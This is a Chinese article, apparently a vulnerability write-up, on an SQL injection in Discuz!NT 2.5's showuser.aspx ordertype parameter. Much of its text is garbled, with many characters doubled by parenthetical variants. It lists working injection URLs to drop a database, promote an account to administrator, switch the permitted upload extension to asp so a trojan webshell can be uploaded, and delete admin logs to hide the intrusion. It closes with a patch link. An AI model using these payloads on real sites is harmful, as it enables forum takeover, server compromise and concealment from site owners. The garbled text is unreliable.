Discuz!NT是一款功能強(qiáng)大的基于ASP.net平臺(tái)的BBS系統(tǒng)，占有不少的市場(chǎng)份額，特別是一些大中型專(zhuān)業(yè)社區(qū)都采用該系統(tǒng)。最近，ISTO成員在其最新的2.5版本中發(fā)現(xiàn)了一個(gè)安全漏洞，成功利用此漏洞可以直接修改管理員的密碼進(jìn)入后臺(tái)，取得管理員權(quán)限，從而控制整個(gè)網(wǎng)站。下面筆者部署環(huán)境解析該漏洞，以期引起大家的重視。
　　環(huán)境描述
　　操作系統(tǒng)：Windows 2003
　　Discuz!NT版本：2.5
　　URL：http://www.gslw.com
　　數(shù)據(jù)庫(kù)：SQL Server 2005
　　1、漏洞起因
　　漏洞是由showuser.aspx文件引起的，該文件的作用是顯示論壇的會(huì)員列表。由于腳本中對(duì)于用來(lái)用戶(hù)排序的ordertype參數(shù)未經(jīng)過(guò)濾而直接查詢(xún)數(shù)據(jù)庫(kù)，攻擊者可以通過(guò)精心構(gòu)造的ordertype參數(shù)進(jìn)行數(shù)據(jù)庫(kù)的寫(xiě)操作。(圖1)

　　2、漏洞測(cè)試
　　判斷Discuz!NT是否存在該漏洞，我們可以構(gòu)造ordertype參數(shù)進(jìn)程測(cè)試。下面代碼的意思是刪除gslw數(shù)據(jù)庫(kù)，由于不存在gslw數(shù)據(jù)庫(kù)因此會(huì)報(bào)錯(cuò)“無(wú)法對(duì)數(shù)據(jù)庫(kù)'glsw'執(zhí)行刪除，因?yàn)樗淮嬖冢蛘吣鷽](méi)有所需的權(quán)限?！边@就說(shuō)明執(zhí)行了數(shù)據(jù)庫(kù)操作，我們可以根據(jù)錯(cuò)誤信息判斷是否存在該漏洞。我們構(gòu)造的URl為
　　http://www.gslw.com/showuser.aspx?ordertype=desc;drop database glsw;--
　　顯示的錯(cuò)誤頁(yè)面見(jiàn)圖1，說(shuō)明存在該漏洞。(圖2)

3、用戶(hù)提權(quán)
　　打開(kāi)論壇注冊(cè)一個(gè)用戶(hù)為hacker的會(huì)員見(jiàn)圖3，然后我們可以進(jìn)行構(gòu)造一段URL通過(guò)showuser.aspx的ordertype參數(shù)將hacker提升為管理員。構(gòu)造的URL為“http://www.gslw.com/showuser.aspx?ordertype=desc;update dnt_users set adminid='1',groupid='1' where username='hacker';--”其作用就是將注冊(cè)用戶(hù)hacker的adminid和guoupid設(shè)置為1，也就是將其提升為管理員。將該URL輸入瀏覽器地址欄回車(chē)后可以看到hacker被提升為管理員見(jiàn)圖4。(圖3)(圖4)


　　hacker被提升為管理員后就可以登錄系統(tǒng)后臺(tái)進(jìn)行各種操作了。Discuz!NT的后臺(tái)功能確實(shí)比較強(qiáng)大，(圖5)

　　4、更改上傳格式
　　該漏洞除了可以提升管理員為，還可以更改默認(rèn)的附件上傳格式。默認(rèn)情況下，Discuz!NT只支持jpg,gif,png,zip,rar,jpeg格式的附件上傳，利用該漏洞可以將其中的某種格式替換為asp、aspx等可執(zhí)行腳本的格式，從而獲得一個(gè)Webshell。我們可以構(gòu)造URL更改其上傳文件格式，比如我們將jgp格式更改為aspx格式，就可以構(gòu)造這樣的URL“http://www.gslw.com/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension='asp' where extension='jpg';--” ，最終的執(zhí)行效果見(jiàn)圖6。(圖6)

5、獲得Webshell
　　通過(guò)上面的操作我們就可以在任意一論壇版塊下發(fā)表新主題 ，然后通過(guò)附件上傳功能將以asp木馬上傳到服務(wù)器。上傳完成后，在“我的附件”項(xiàng)下可以找到上傳的asp木馬，點(diǎn)擊該asp網(wǎng)馬就直接運(yùn)行，登錄后獲得一個(gè)webshell。(圖7)

　　6、清除痕跡
　　獲得webshell后，就可以通過(guò)該漏洞構(gòu)造URL清除痕跡，恢復(fù)Discuz!NT的默認(rèn)狀態(tài)。主要包括一下幾項(xiàng)：
　　http://www.gslw.com/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension='jpg' where extension='asp';-- 改回jpg格式
　　http://www.gslw.com/showuser.aspx?ordertype=desc;delete from dnt_adminvisitlog where username='hacker';-- 清除日志
　　http://www.gslw.com/showuser.aspx?ordertype=desc;update dnt_users set adminid='',groupid='' where username='hacker';-- hacker降權(quán)限
　　7、總結(jié)及防范
　　從上面的演示可以看到該漏洞對(duì)采用Discuz!NT的BBS威脅極大，攻擊者不僅能夠進(jìn)入后臺(tái)，而且可以獲取webshell，進(jìn)而滲透控制服務(wù)器。筆者上面演示用的是asp木馬，如果用aspx木馬其權(quán)限將更大，拿下服務(wù)器將會(huì)更容易。
　　針對(duì)此漏洞Discuz!NT官方提供了補(bǔ)丁，該補(bǔ)丁的地址為：
　　http://download.comsenz.com/DiscuzNT/patch/dnt_25_n2_patch20080829.zip
　　修正方法是將壓縮包中的Discuz.Web.dll文件上傳到bin目錄，覆蓋掉以前的文件。雖然Discuz!NT比較迅速地發(fā)布了補(bǔ)丁，但是筆者在此刻進(jìn)行了安全測(cè)試，有相當(dāng)多的采用Discuz!NT 2.5系統(tǒng)的BBS論壇依舊沒(méi)有打該補(bǔ)丁。希望通過(guò)此文，能夠引起大家對(duì)該漏洞的重視，盡快修復(fù)漏洞。

最新評(píng)論